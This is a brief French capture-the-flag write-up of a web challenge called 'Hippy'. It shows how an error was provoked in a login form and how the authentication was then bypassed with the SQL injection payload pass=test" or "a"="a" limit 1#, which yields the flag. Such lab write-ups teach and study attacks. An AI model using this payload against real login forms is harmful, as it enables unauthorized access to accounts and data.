WEB 50 - Hippy

Nous voici sur un site controlé par des hippies , il faut absolument accèder à la page admin !

Nous allons essayer de faire renvoyer une erreur par le formulaire pour voir comment nous pouvons l'exploiter.

 username=admin&pass=test" 

Gagné , une injection sql est possible :)

Nous allons bypasser l'authentification :

username=admin&pass=test" or "a"="a" limit 1# 

Le flag est à nous : FLAG{Non, c'est quand je suis content je vomi, et là, là je suis super content.}